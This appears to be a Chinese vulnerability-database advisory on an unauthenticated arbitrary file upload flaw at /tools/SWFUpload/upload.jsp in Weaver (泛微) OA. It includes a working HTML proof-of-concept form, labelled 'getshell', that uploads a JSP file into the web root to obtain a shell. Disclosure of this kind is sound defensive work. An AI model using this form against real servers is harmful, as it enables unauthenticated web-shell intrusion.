泛微 OA /tools/SWFUpload/upload.jsp 任意文件上传漏洞

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

<p>&nbsp; &nbsp; 发现 tools/SWFUpload/upload.jsp ,并未验证当前用户是否为登录状态,提交文件,可直接写入根目录下。最终得到的文件访问路径为:<a href="http://www.xxoo.com/null" rel="nofollow">http://www.xxoo.com/null</a>上传的文件名.jsp。<br></p><p>本地构造提交表单<br></p><pre class="lang-html" data-lang="html">&lt;form method='post' action='http://www.xxoo.com/tools/SWFUpload/upload.jsp' enctype="multipart/form-data" &gt; &lt;input type="file" id="file" name="test" style="height:20px;BORDER: #8F908B 1px solid;"/&gt; &lt;button type=submit value="getshell"&gt;getshell&lt;/button&gt; &lt;/form&gt; </pre><p>上传后直接getshell,造成任意文件上传的漏洞。</p>

0%
暂无可用Exp或PoC
当前有0条受影响产品信息